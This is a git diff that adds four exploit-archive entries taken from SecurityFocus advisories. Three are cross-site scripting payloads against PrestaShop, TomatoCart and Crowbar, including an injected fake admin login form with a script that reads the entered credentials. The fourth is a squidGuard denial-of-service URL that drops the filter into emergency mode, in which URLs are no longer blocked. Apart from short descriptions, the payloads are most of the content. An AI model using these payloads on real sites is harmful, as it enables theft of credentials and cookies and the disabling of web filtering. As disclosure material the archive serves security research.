diff --git a/platforms/php/webapps/37684.html b/platforms/php/webapps/37684.html
new file mode 100755
index 000000000..ef1c42070
--- /dev/null
+++ b/platforms/php/webapps/37684.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55280/info
+
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+<form action="http://[host]/[ADMIN_PANEL]/ajax.php" method="post"> <input type="hidden" name="ajaxProductsPositions" value='' /> <input type="hidden" name="id_product" value='1' /> <input type="hidden" name="id_category" value='1' /> <input type="hidden" name='product[<form action="/[ADMIN_PANEL]/login.php" method="post"><input type="text" id="email" name="email" value="" class="input"/><input id="passwd" type="password" name="passwd" class="input" value=""/></form><script>function hackfunc() { alert("Your Login: "+document.getElementById("email").value+"\nYour Password: "+document.getElementById("passwd").value); } setTimeout("hackfunc()", 1000);</script>]' value='1_1_1' /> <input type="submit" id="btn"> </form> 
\ No newline at end of file
diff --git a/platforms/php/webapps/37687.txt b/platforms/php/webapps/37687.txt
new file mode 100755
index 000000000..84ec0453d
--- /dev/null
+++ b/platforms/php/webapps/37687.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55295/info
+
+TomatoCart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TomatoCart 1.1.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/with/tomato/ext/secureimage/example_from.ajax.php/"></script><whatever.now> 
\ No newline at end of file
diff --git a/platforms/php/webapps/37690.txt b/platforms/php/webapps/37690.txt
new file mode 100755
index 000000000..cfbff87ed
--- /dev/null
+++ b/platforms/php/webapps/37690.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55315/info
+
+Crowbar is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/utils?waiting=true&file=foo'%3B})% 3B}alert(document.cookie)</script><!-- 
\ No newline at end of file
diff --git a/platforms/xml/webapps/37685.txt b/platforms/xml/webapps/37685.txt
new file mode 100755
index 000000000..e773389bd
--- /dev/null
+++ b/platforms/xml/webapps/37685.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/55291/info
+
+squidGuard is prone to a remote denial-of-service vulnerability.
+
+A successful exploit will cause the application to enter emergency mode in which URLs are not blocked. This will result in a denial-of-service condition.
+
+squidGuard 1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa
+ rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=3D0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm
+ =0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par
+ m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=3D0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par
+ m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697
+